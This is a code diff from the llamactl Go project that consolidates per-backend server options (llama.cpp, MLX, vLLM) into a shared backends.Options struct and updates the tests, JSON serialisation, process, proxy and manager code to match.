if opts.BackendOptions.BackendType != backends.BackendTypeLlamaCpp {
|
||||
t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendOptions.BackendType)
|
||||
}
|
||||
if opts.LlamaServerOptions == nil {
|
||||
if opts.BackendOptions.LlamaServerOptions == nil {
|
||||
t.Fatal("Expected LlamaServerOptions to be set")
|
||||
}
|
||||
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
|
||||
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
|
||||
}
|
||||
if inst.GetPort() != 8080 {
|
||||
t.Errorf("Expected port 8080, got %d", inst.GetPort())
|
||||
@@ -490,9 +366,11 @@ func TestCreateOptionsValidation(t *testing.T) {
|
||||
options := &instance.Options{
|
||||
MaxRestarts: tt.maxRestarts,
|
||||
RestartDelay: tt.restartDelay,
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -523,9 +401,11 @@ func TestStatusChangeCallback(t *testing.T) {
|
||||
}
|
||||
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -588,10 +468,12 @@ func TestSetOptions_NodesPreserved(t *testing.T) {
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
Nodes: tt.initialNodes,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Nodes: tt.initialNodes,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -599,10 +481,12 @@ func TestSetOptions_NodesPreserved(t *testing.T) {
|
||||
|
||||
// Attempt to update nodes (should be ignored)
|
||||
updateOptions := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
Nodes: tt.updateNodes,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Nodes: tt.updateNodes,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
inst.SetOptions(updateOptions)
|
||||
@@ -620,8 +504,8 @@ func TestSetOptions_NodesPreserved(t *testing.T) {
|
||||
}
|
||||
|
||||
// Verify other options were updated
|
||||
if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected model to be updated to '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
|
||||
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected model to be updated to '/path/to/new-model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
|
||||
}
|
||||
})
|
||||
}
|
||||
@@ -633,9 +517,11 @@ func TestProcessErrorCases(t *testing.T) {
|
||||
}
|
||||
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -663,10 +549,12 @@ func TestRemoteInstanceOperations(t *testing.T) {
|
||||
}
|
||||
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
Nodes: map[string]struct{}{"remote-node": {}}, // Remote instance
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Nodes: map[string]struct{}{"remote-node": {}}, // Remote instance
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -702,49 +590,6 @@ func TestRemoteInstanceOperations(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestProxyClearOnOptionsChange(t *testing.T) {
|
||||
backendConfig := &config.BackendConfig{
|
||||
LlamaCpp: config.BackendSettings{Command: "llama-server"},
|
||||
}
|
||||
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Host: "localhost",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
inst := instance.New("test", backendConfig, globalSettings, options, "main", nil)
|
||||
|
||||
// Get initial proxy
|
||||
proxy1, err := inst.GetProxy()
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to get initial proxy: %v", err)
|
||||
}
|
||||
|
||||
// Update options (should clear proxy)
|
||||
newOptions := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Host: "localhost",
|
||||
Port: 8081, // Different port
|
||||
},
|
||||
}
|
||||
inst.SetOptions(newOptions)
|
||||
|
||||
// Get proxy again - should be recreated with new port
|
||||
proxy2, err := inst.GetProxy()
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to get proxy after options change: %v", err)
|
||||
}
|
||||
|
||||
// Proxies should be different instances (recreated)
|
||||
if proxy1 == proxy2 {
|
||||
t.Error("Expected proxy to be recreated after options change")
|
||||
}
|
||||
}
|
||||
|
||||
func TestIdleTimeout(t *testing.T) {
|
||||
backendConfig := &config.BackendConfig{
|
||||
LlamaCpp: config.BackendSettings{Command: "llama-server"},
|
||||
@@ -754,10 +599,12 @@ func TestIdleTimeout(t *testing.T) {
|
||||
t.Run("not running never times out", func(t *testing.T) {
|
||||
timeout := 1
|
||||
inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
IdleTimeout: &timeout,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}, "main", nil)
|
||||
|
||||
@@ -768,10 +615,12 @@ func TestIdleTimeout(t *testing.T) {
|
||||
|
||||
t.Run("no timeout configured", func(t *testing.T) {
|
||||
inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
IdleTimeout: nil, // No timeout
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}, "main", nil)
|
||||
inst.SetStatus(instance.Running)
|
||||
@@ -784,10 +633,12 @@ func TestIdleTimeout(t *testing.T) {
|
||||
t.Run("timeout exceeded", func(t *testing.T) {
|
||||
timeout := 1 // 1 minute
|
||||
inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
IdleTimeout: &timeout,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}, "main", nil)
|
||||
inst.SetStatus(instance.Running)
|
||||
|
||||
@@ -4,12 +4,8 @@ import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/backends/mlx"
|
||||
"llamactl/pkg/backends/vllm"
|
||||
"llamactl/pkg/config"
|
||||
"log"
|
||||
"maps"
|
||||
"slices"
|
||||
"sync"
|
||||
)
|
||||
@@ -24,18 +20,12 @@ type Options struct {
|
||||
OnDemandStart *bool `json:"on_demand_start,omitempty"`
|
||||
// Idle timeout
|
||||
IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
|
||||
//Environment variables
|
||||
// Environment variables
|
||||
Environment map[string]string `json:"environment,omitempty"`
|
||||
|
||||
BackendType backends.BackendType `json:"backend_type"`
|
||||
BackendOptions map[string]any `json:"backend_options,omitempty"`
|
||||
|
||||
// Assigned nodes
|
||||
Nodes map[string]struct{} `json:"-"`
|
||||
|
||||
// Backend-specific options
|
||||
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
|
||||
MlxServerOptions *mlx.MlxServerOptions `json:"-"`
|
||||
VllmServerOptions *vllm.VllmServerOptions `json:"-"`
|
||||
// Backend options
|
||||
BackendOptions backends.Options `json:"-"`
|
||||
}
|
||||
|
||||
// options wraps Options with thread-safe access (unexported).
|
||||
@@ -65,6 +55,18 @@ func (o *options) set(opts *Options) {
|
||||
o.opts = opts
|
||||
}
|
||||
|
||||
func (o *options) GetHost() string {
|
||||
o.mu.RLock()
|
||||
defer o.mu.RUnlock()
|
||||
return o.opts.BackendOptions.GetHost()
|
||||
}
|
||||
|
||||
func (o *options) GetPort() int {
|
||||
o.mu.RLock()
|
||||
defer o.mu.RUnlock()
|
||||
return o.opts.BackendOptions.GetPort()
|
||||
}
|
||||
|
||||
// MarshalJSON implements json.Marshaler for options wrapper
|
||||
func (o *options) MarshalJSON() ([]byte, error) {
|
||||
o.mu.RLock()
|
||||
@@ -88,7 +90,9 @@ func (c *Options) UnmarshalJSON(data []byte) error {
|
||||
// Use anonymous struct to avoid recursion
|
||||
type Alias Options
|
||||
aux := &struct {
|
||||
Nodes []string `json:"nodes,omitempty"` // Accept JSON array
|
||||
Nodes []string `json:"nodes,omitempty"`
|
||||
BackendType backends.BackendType `json:"backend_type"`
|
||||
BackendOptions map[string]any `json:"backend_options,omitempty"`
|
||||
*Alias
|
||||
}{
|
||||
Alias: (*Alias)(c),
|
||||
@@ -106,47 +110,27 @@ func (c *Options) UnmarshalJSON(data []byte) error {
|
||||
}
|
||||
}
|
||||
|
||||
// Parse backend-specific options
|
||||
switch c.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if c.BackendOptions != nil {
|
||||
// Convert map to JSON and then unmarshal to LlamaServerOptions
|
||||
optionsData, err := json.Marshal(c.BackendOptions)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to marshal backend options: %w", err)
|
||||
}
|
||||
// Create backend options struct and unmarshal
|
||||
c.BackendOptions = backends.Options{
|
||||
BackendType: aux.BackendType,
|
||||
BackendOptions: aux.BackendOptions,
|
||||
}
|
||||
|
||||
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
|
||||
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
|
||||
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
|
||||
}
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
if c.BackendOptions != nil {
|
||||
optionsData, err := json.Marshal(c.BackendOptions)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to marshal backend options: %w", err)
|
||||
}
|
||||
// Marshal the backend options to JSON for proper unmarshaling
|
||||
backendJson, err := json.Marshal(struct {
|
||||
BackendType backends.BackendType `json:"backend_type"`
|
||||
BackendOptions map[string]any `json:"backend_options,omitempty"`
|
||||
}{
|
||||
BackendType: aux.BackendType,
|
||||
BackendOptions: aux.BackendOptions,
|
||||
})
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to marshal backend options: %w", err)
|
||||
}
|
||||
|
||||
c.MlxServerOptions = &mlx.MlxServerOptions{}
|
||||
if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil {
|
||||
return fmt.Errorf("failed to unmarshal MLX options: %w", err)
|
||||
}
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if c.BackendOptions != nil {
|
||||
optionsData, err := json.Marshal(c.BackendOptions)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to marshal backend options: %w", err)
|
||||
}
|
||||
|
||||
c.VllmServerOptions = &vllm.VllmServerOptions{}
|
||||
if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil {
|
||||
return fmt.Errorf("failed to unmarshal vLLM options: %w", err)
|
||||
}
|
||||
}
|
||||
default:
|
||||
return fmt.Errorf("unknown backend type: %s", c.BackendType)
|
||||
// Unmarshal into the backends.Options struct to trigger its custom unmarshaling
|
||||
if err := json.Unmarshal(backendJson, &c.BackendOptions); err != nil {
|
||||
return fmt.Errorf("failed to unmarshal backend options: %w", err)
|
||||
}
|
||||
|
||||
return nil
|
||||
@@ -157,7 +141,9 @@ func (c *Options) MarshalJSON() ([]byte, error) {
|
||||
// Use anonymous struct to avoid recursion
|
||||
type Alias Options
|
||||
aux := struct {
|
||||
Nodes []string `json:"nodes,omitempty"` // Output as JSON array
|
||||
Nodes []string `json:"nodes,omitempty"` // Output as JSON array
|
||||
BackendType backends.BackendType `json:"backend_type"`
|
||||
BackendOptions map[string]any `json:"backend_options,omitempty"`
|
||||
*Alias
|
||||
}{
|
||||
Alias: (*Alias)(c),
|
||||
@@ -173,52 +159,26 @@ func (c *Options) MarshalJSON() ([]byte, error) {
|
||||
slices.Sort(aux.Nodes)
|
||||
}
|
||||
|
||||
// Convert backend-specific options back to BackendOptions map for JSON
|
||||
switch c.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if c.LlamaServerOptions != nil {
|
||||
data, err := json.Marshal(c.LlamaServerOptions)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
|
||||
}
|
||||
// Set backend type
|
||||
aux.BackendType = c.BackendOptions.BackendType
|
||||
|
||||
var backendOpts map[string]any
|
||||
if err := json.Unmarshal(data, &backendOpts); err != nil {
|
||||
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
|
||||
}
|
||||
|
||||
aux.BackendOptions = backendOpts
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
if c.MlxServerOptions != nil {
|
||||
data, err := json.Marshal(c.MlxServerOptions)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to marshal MLX server options: %w", err)
|
||||
}
|
||||
|
||||
var backendOpts map[string]any
|
||||
if err := json.Unmarshal(data, &backendOpts); err != nil {
|
||||
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
|
||||
}
|
||||
|
||||
aux.BackendOptions = backendOpts
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if c.VllmServerOptions != nil {
|
||||
data, err := json.Marshal(c.VllmServerOptions)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to marshal vLLM server options: %w", err)
|
||||
}
|
||||
|
||||
var backendOpts map[string]any
|
||||
if err := json.Unmarshal(data, &backendOpts); err != nil {
|
||||
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
|
||||
}
|
||||
|
||||
aux.BackendOptions = backendOpts
|
||||
}
|
||||
// Marshal the backends.Options struct to get the properly formatted backend options
|
||||
// Marshal a pointer to trigger the pointer receiver MarshalJSON method
|
||||
backendData, err := json.Marshal(&c.BackendOptions)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to marshal backend options: %w", err)
|
||||
}
|
||||
|
||||
// Unmarshal into a temporary struct to extract the backend_options map
|
||||
var tempBackend struct {
|
||||
BackendOptions map[string]any `json:"backend_options,omitempty"`
|
||||
}
|
||||
if err := json.Unmarshal(backendData, &tempBackend); err != nil {
|
||||
return nil, fmt.Errorf("failed to unmarshal backend data: %w", err)
|
||||
}
|
||||
|
||||
aux.BackendOptions = tempBackend.BackendOptions
|
||||
|
||||
return json.Marshal(aux)
|
||||
}
|
||||
|
||||
@@ -260,78 +220,3 @@ func (c *Options) validateAndApplyDefaults(name string, globalSettings *config.I
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// getCommand builds the command to run the backend
|
||||
func (c *Options) getCommand(backendConfig *config.BackendSettings) string {
|
||||
|
||||
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
|
||||
return "docker"
|
||||
}
|
||||
|
||||
return backendConfig.Command
|
||||
}
|
||||
|
||||
// buildCommandArgs builds command line arguments for the backend
|
||||
func (c *Options) buildCommandArgs(backendConfig *config.BackendSettings) []string {
|
||||
|
||||
var args []string
|
||||
|
||||
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
|
||||
// For Docker, start with Docker args
|
||||
args = append(args, backendConfig.Docker.Args...)
|
||||
args = append(args, backendConfig.Docker.Image)
|
||||
|
||||
switch c.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if c.LlamaServerOptions != nil {
|
||||
args = append(args, c.LlamaServerOptions.BuildDockerArgs()...)
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if c.VllmServerOptions != nil {
|
||||
args = append(args, c.VllmServerOptions.BuildDockerArgs()...)
|
||||
}
|
||||
}
|
||||
|
||||
} else {
|
||||
// For native execution, start with backend args
|
||||
args = append(args, backendConfig.Args...)
|
||||
|
||||
switch c.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if c.LlamaServerOptions != nil {
|
||||
args = append(args, c.LlamaServerOptions.BuildCommandArgs()...)
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
if c.MlxServerOptions != nil {
|
||||
args = append(args, c.MlxServerOptions.BuildCommandArgs()...)
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if c.VllmServerOptions != nil {
|
||||
args = append(args, c.VllmServerOptions.BuildCommandArgs()...)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return args
|
||||
}
|
||||
|
||||
// buildEnvironment builds the environment variables for the backend process
|
||||
func (c *Options) buildEnvironment(backendConfig *config.BackendSettings) map[string]string {
|
||||
env := map[string]string{}
|
||||
|
||||
if backendConfig.Environment != nil {
|
||||
maps.Copy(env, backendConfig.Environment)
|
||||
}
|
||||
|
||||
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
|
||||
if backendConfig.Docker.Environment != nil {
|
||||
maps.Copy(env, backendConfig.Docker.Environment)
|
||||
}
|
||||
}
|
||||
|
||||
if c.Environment != nil {
|
||||
maps.Copy(env, c.Environment)
|
||||
}
|
||||
|
||||
return env
|
||||
}
|
||||
|
||||
@@ -12,9 +12,6 @@ import (
|
||||
"sync"
|
||||
"syscall"
|
||||
"time"
|
||||
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/config"
|
||||
)
|
||||
|
||||
// process manages the OS process lifecycle for a local instance.
|
||||
@@ -216,7 +213,8 @@ func (p *process) waitForHealthy(timeout int) error {
|
||||
defer cancel()
|
||||
|
||||
// Get host/port from instance
|
||||
host, port := p.instance.getBackendHostPort()
|
||||
host := p.instance.options.GetHost()
|
||||
port := p.instance.options.GetPort()
|
||||
healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
|
||||
|
||||
// Create a dedicated HTTP client for health checks
|
||||
@@ -386,26 +384,15 @@ func (p *process) handleAutoRestart(err error) {
|
||||
|
||||
// buildCommand builds the command to execute using backend-specific logic
|
||||
func (p *process) buildCommand() (*exec.Cmd, error) {
|
||||
// Get options
|
||||
opts := p.instance.GetOptions()
|
||||
if opts == nil {
|
||||
return nil, fmt.Errorf("instance options are nil")
|
||||
}
|
||||
|
||||
// Get backend configuration
|
||||
backendConfig, err := p.getBackendConfig()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// Build the environment variables
|
||||
env := opts.buildEnvironment(backendConfig)
|
||||
env := p.instance.buildEnvironment()
|
||||
|
||||
// Get the command to execute
|
||||
command := opts.getCommand(backendConfig)
|
||||
command := p.instance.getCommand()
|
||||
|
||||
// Build command arguments
|
||||
args := opts.buildCommandArgs(backendConfig)
|
||||
args := p.instance.buildCommandArgs()
|
||||
|
||||
// Create the exec.Cmd
|
||||
cmd := exec.CommandContext(p.ctx, command, args...)
|
||||
@@ -420,27 +407,3 @@ func (p *process) buildCommand() (*exec.Cmd, error) {
|
||||
|
||||
return cmd, nil
|
||||
}
|
||||
|
||||
// getBackendConfig resolves the backend configuration for the current instance
|
||||
func (p *process) getBackendConfig() (*config.BackendSettings, error) {
|
||||
opts := p.instance.GetOptions()
|
||||
if opts == nil {
|
||||
return nil, fmt.Errorf("instance options are nil")
|
||||
}
|
||||
|
||||
var backendTypeStr string
|
||||
|
||||
switch opts.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
backendTypeStr = "llama-cpp"
|
||||
case backends.BackendTypeMlxLm:
|
||||
backendTypeStr = "mlx"
|
||||
case backends.BackendTypeVllm:
|
||||
backendTypeStr = "vllm"
|
||||
default:
|
||||
return nil, fmt.Errorf("unsupported backend type: %s", opts.BackendType)
|
||||
}
|
||||
|
||||
settings := p.instance.globalBackendSettings.GetBackendSettings(backendTypeStr)
|
||||
return &settings, nil
|
||||
}
|
||||
|
||||
@@ -2,7 +2,6 @@ package instance
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"llamactl/pkg/backends"
|
||||
"net/http"
|
||||
"net/http/httputil"
|
||||
"net/url"
|
||||
@@ -63,13 +62,16 @@ func (p *proxy) build() (*httputil.ReverseProxy, error) {
|
||||
}
|
||||
|
||||
// Remote instances should not use local proxy - they are handled by RemoteInstanceProxy
|
||||
if len(options.Nodes) > 0 {
|
||||
if _, isLocal := options.Nodes[p.instance.localNodeName]; !isLocal {
|
||||
return nil, fmt.Errorf("instance %s is a remote instance and should not use local proxy", p.instance.Name)
|
||||
}
|
||||
|
||||
// Get host/port from process
|
||||
host, port := p.instance.getBackendHostPort()
|
||||
|
||||
host := p.instance.options.GetHost()
|
||||
port := p.instance.options.GetPort()
|
||||
if port == 0 {
|
||||
return nil, fmt.Errorf("instance %s has no port assigned", p.instance.Name)
|
||||
}
|
||||
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", p.instance.Name, err)
|
||||
@@ -78,15 +80,7 @@ func (p *proxy) build() (*httputil.ReverseProxy, error) {
|
||||
proxy := httputil.NewSingleHostReverseProxy(targetURL)
|
||||
|
||||
// Get response headers from backend config
|
||||
var responseHeaders map[string]string
|
||||
switch options.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
responseHeaders = p.instance.globalBackendSettings.LlamaCpp.ResponseHeaders
|
||||
case backends.BackendTypeVllm:
|
||||
responseHeaders = p.instance.globalBackendSettings.VLLM.ResponseHeaders
|
||||
case backends.BackendTypeMlxLm:
|
||||
responseHeaders = p.instance.globalBackendSettings.MLX.ResponseHeaders
|
||||
}
|
||||
responseHeaders := options.BackendOptions.GetResponseHeaders(p.instance.globalBackendSettings)
|
||||
|
||||
proxy.ModifyResponse = func(resp *http.Response) error {
|
||||
// Remove CORS headers from backend response to avoid conflicts
|
||||
|
||||
@@ -3,7 +3,6 @@ package manager_test
|
||||
import (
|
||||
"fmt"
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/manager"
|
||||
@@ -71,10 +70,12 @@ func TestPersistence(t *testing.T) {
|
||||
// Test instance persistence on creation
|
||||
manager1 := manager.NewInstanceManager(backendConfig, cfg, map[string]config.NodeConfig{}, "main")
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -133,9 +134,11 @@ func TestConcurrentAccess(t *testing.T) {
|
||||
go func(index int) {
|
||||
defer wg.Done()
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
instanceName := fmt.Sprintf("concurrent-test-%d", index)
|
||||
@@ -170,9 +173,11 @@ func TestShutdown(t *testing.T) {
|
||||
|
||||
// Create test instance
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
_, err := mgr.CreateInstance("test-instance", options)
|
||||
@@ -231,11 +236,13 @@ func TestAutoRestartDisabledInstanceStatus(t *testing.T) {
|
||||
|
||||
autoRestart := false
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
AutoRestart: &autoRestart,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
|
||||
@@ -2,7 +2,6 @@ package manager
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/validation"
|
||||
"os"
|
||||
@@ -86,7 +85,7 @@ func (im *instanceManager) CreateInstance(name string, options *instance.Options
|
||||
return nil, err
|
||||
}
|
||||
|
||||
err = validation.ValidateInstanceOptions(options)
|
||||
err = options.BackendOptions.ValidateInstanceOptions()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
@@ -232,7 +231,7 @@ func (im *instanceManager) UpdateInstance(name string, options *instance.Options
|
||||
return nil, fmt.Errorf("instance options cannot be nil")
|
||||
}
|
||||
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
err := options.BackendOptions.ValidateInstanceOptions()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
@@ -493,39 +492,12 @@ func (im *instanceManager) GetInstanceLogs(name string, numLines int) (string, e
|
||||
|
||||
// getPortFromOptions extracts the port from backend-specific options
|
||||
func (im *instanceManager) getPortFromOptions(options *instance.Options) int {
|
||||
switch options.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if options.LlamaServerOptions != nil {
|
||||
return options.LlamaServerOptions.Port
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
if options.MlxServerOptions != nil {
|
||||
return options.MlxServerOptions.Port
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if options.VllmServerOptions != nil {
|
||||
return options.VllmServerOptions.Port
|
||||
}
|
||||
}
|
||||
return 0
|
||||
return options.BackendOptions.GetPort()
|
||||
}
|
||||
|
||||
// setPortInOptions sets the port in backend-specific options
|
||||
func (im *instanceManager) setPortInOptions(options *instance.Options, port int) {
|
||||
switch options.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if options.LlamaServerOptions != nil {
|
||||
options.LlamaServerOptions.Port = port
|
||||
